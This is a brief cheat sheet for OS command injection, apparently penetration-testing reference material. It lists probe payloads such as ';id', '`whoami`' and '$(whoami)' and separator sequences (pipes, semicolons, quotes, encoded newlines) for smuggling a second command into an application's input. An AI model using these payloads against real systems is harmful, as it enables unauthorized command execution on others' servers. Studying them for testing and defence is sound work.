OS Command Injection

cheat sheet

Identification

;id
;id;
;id|
|id
| ls /
& whoami
`whoami`
$(whoami)

Initial sequence

Follow the initial sequence with your OS command payload

&
&&
|
||
;
"
";
'"
';
%0a
%0d%0a
\0
\n
\r
*;
